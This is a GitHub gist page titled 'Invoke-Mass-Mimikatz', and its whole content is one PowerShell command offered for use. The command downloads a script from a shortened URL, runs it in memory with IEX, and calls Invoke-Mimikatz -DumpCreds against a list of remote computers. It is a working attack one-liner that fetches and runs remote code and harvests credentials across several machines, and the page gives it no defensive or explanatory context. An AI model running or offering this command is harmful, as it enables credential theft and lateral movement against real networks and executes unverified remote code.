Created
July 24, 2015 21:07
-
-
Save ahhh/8b39d3711827026df7af to your computer and use it in GitHub Desktop.
Invoke-Mass-Mimikatz against an array of machines using PowerShell Remoting
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment